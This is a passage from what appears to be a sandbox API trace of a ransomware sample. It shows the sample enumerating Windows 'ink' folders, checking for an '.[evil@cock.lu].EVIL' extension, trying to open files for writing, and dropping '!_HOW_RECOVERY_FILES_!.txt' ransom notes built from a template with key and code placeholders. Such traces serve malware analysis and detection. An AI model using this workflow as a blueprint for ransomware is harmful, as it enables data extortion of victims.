_String2=".") returned 0 [0088.663] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.663] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.663] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\..") returned 60 [0088.663] wcscmp (_String1=".", _String2="..") returned -1 [0088.663] wcscmp (_String1="..", _String2="..") returned 0 [0088.663] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.663] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.663] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 73 [0088.663] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.663] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.663] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 0x49 [0088.663] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.663] GetLastError () returned 0x5 [0088.663] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.664] FindClose (in: hFindFile=0x84b11dd7a0 | out: hFindFile=0x84b11dd7a0) returned 1 [0088.664] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 0x39 [0088.664] strlen (_Str="${KEY}") returned 0x6 [0088.664] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.664] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.664] strlen (_Str="${CODE}") returned 0x7 [0088.664] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.664] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.664] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.664] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.664] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.664] __uncaught_exception () returned 0x84b1160800 [0088.664] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.665] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.665] wcsstr (_Str="micaut.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.665] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll") returned 62 [0088.665] wcscmp (_String1="micaut.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.665] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="micaut.dll") returned 0x0 [0088.665] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll") returned 0x3e [0088.665] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.666] GetLastError () returned 0x5 [0088.666] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.666] wcsstr (_Str="Microsoft.Ink.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.666] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 69 [0088.666] wcscmp (_String1="Microsoft.Ink.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.666] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Microsoft.Ink.dll") returned 0x0 [0088.666] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 0x45 [0088.666] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.666] GetLastError () returned 0x5 [0088.666] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.666] wcsstr (_Str="mip.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.666] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 59 [0088.666] wcscmp (_String1="mip.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.666] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mip.exe") returned 0x0 [0088.666] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 0x3b [0088.666] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.667] GetLastError () returned 0x5 [0088.667] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.667] wcsstr (_Str="mraut.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.667] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 61 [0088.667] wcscmp (_String1="mraut.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.667] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mraut.dll") returned 0x0 [0088.667] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 0x3d [0088.667] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.672] GetLastError () returned 0x5 [0088.672] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.672] wcsstr (_Str="mshwgst.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.672] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 63 [0088.672] wcscmp (_String1="mshwgst.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.672] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mshwgst.dll") returned 0x0 [0088.672] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 0x3f [0088.672] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.672] GetLastError () returned 0x5 [0088.672] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.672] wcsstr (_Str="mshwLatin.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.672] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned 65 [0088.672] wcscmp (_String1="mshwLatin.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.672] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mshwLatin.dll") returned 0x0 [0088.672] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned 0x41 [0088.672] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.673] GetLastError () returned 0x5 [0088.673] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.673] wcsstr (_Str="nb-NO", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.673] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 57 [0088.673] wcscmp (_String1=".", _String2="nb-NO") returned -1 [0088.673] wcscmp (_String1="..", _String2="nb-NO") returned -1 [0088.673] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 0x39 [0088.673] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 0x0 [0088.673] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*" [0088.673] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddda0 [0088.673] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.673] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\.") returned 59 [0088.673] wcscmp (_String1=".", _String2=".") returned 0 [0088.673] FindNextFileW (in: hFindFile=0x84b11ddda0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.673] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.673] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\..") returned 60 [0088.673] wcscmp (_String1=".", _String2="..") returned -1 [0088.674] wcscmp (_String1="..", _String2="..") returned 0 [0088.674] FindNextFileW (in: hFindFile=0x84b11ddda0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.674] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.674] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 73 [0088.674] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.674] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.674] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 0x49 [0088.674] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.674] GetLastError () returned 0x5 [0088.674] FindNextFileW (in: hFindFile=0x84b11ddda0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.674] FindClose (in: hFindFile=0x84b11ddda0 | out: hFindFile=0x84b11ddda0) returned 1 [0088.674] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 0x39 [0088.674] strlen (_Str="${KEY}") returned 0x6 [0088.674] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.674] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.674] strlen (_Str="${CODE}") returned 0x7 [0088.674] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.674] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.674] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.674] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.675] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.675] __uncaught_exception () returned 0x84b1160800 [0088.675] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.675] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.675] wcsstr (_Str="nl-NL", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.675] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 57 [0088.675] wcscmp (_String1=".", _String2="nl-NL") returned -1 [0088.675] wcscmp (_String1="..", _String2="nl-NL") returned -1 [0088.675] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 0x39 [0088.675] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 0x0 [0088.675] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*" [0088.676] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd980 [0088.676] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.676] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\.") returned 59 [0088.676] wcscmp (_String1=".", _String2=".") returned 0 [0088.676] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.676] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.676] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\..") returned 60 [0088.676] wcscmp (_String1=".", _String2="..") returned -1 [0088.676] wcscmp (_String1="..", _String2="..") returned 0 [0088.676] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.676] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.676] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 73 [0088.676] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.676] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.676] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 0x49 [0088.676] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.676] GetLastError () returned 0x5 [0088.676] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.676] FindClose (in: hFindFile=0x84b11dd980 | out: hFindFile=0x84b11dd980) returned 1 [0088.676] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 0x39 [0088.676] strlen (_Str="${KEY}") returned 0x6 [0088.676] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.676] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.676] strlen (_Str="${CODE}") returned 0x7 [0088.676] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.676] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.676] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.677] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.677] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.677] __uncaught_exception () returned 0x84b1160800 [0088.677] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.678] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.678] wcsstr (_Str="pl-PL", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.678] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 57 [0088.678] wcscmp (_String1=".", _String2="pl-PL") returned -1 [0088.678] wcscmp (_String1="..", _String2="pl-PL") returned -1 [0088.678] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 0x39 [0088.678] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 0x0 [0088.678] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*" [0088.678] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd680 [0088.678] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.678] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\.") returned 59 [0088.678] wcscmp (_String1=".", _String2=".") returned 0 [0088.678] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.678] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.678] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\..") returned 60 [0088.678] wcscmp (_String1=".", _String2="..") returned -1 [0088.678] wcscmp (_String1="..", _String2="..") returned 0 [0088.678] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.678] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.678] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 73 [0088.678] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.678] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.678] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 0x49 [0088.678] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.679] GetLastError () returned 0x5 [0088.679] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.679] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0088.679] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 0x39 [0088.679] strlen (_Str="${KEY}") returned 0x6 [0088.679] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.679] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.679] strlen (_Str="${CODE}") returned 0x7 [0088.679] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.679] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.679] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.679] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.679] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.679] __uncaught_exception () returned 0x84b1160800 [0088.679] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.680] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.680] wcsstr (_Str="pt-BR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.680] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 57 [0088.680] wcscmp (_String1=".", _String2="pt-BR") returned -1 [0088.680] wcscmp (_String1="..", _String2="pt-BR") returned -1 [0088.680] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 0x39 [0088.680] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 0x0 [0088.680] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*" [0088.680] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd0e0 [0088.680] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.680] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\.") returned 59 [0088.680] wcscmp (_String1=".", _String2=".") returned 0 [0088.680] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.681] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.681] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\..") returned 60 [0088.681] wcscmp (_String1=".", _String2="..") returned -1 [0088.681] wcscmp (_String1="..", _String2="..") returned 0 [0088.681] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.681] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.681] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft 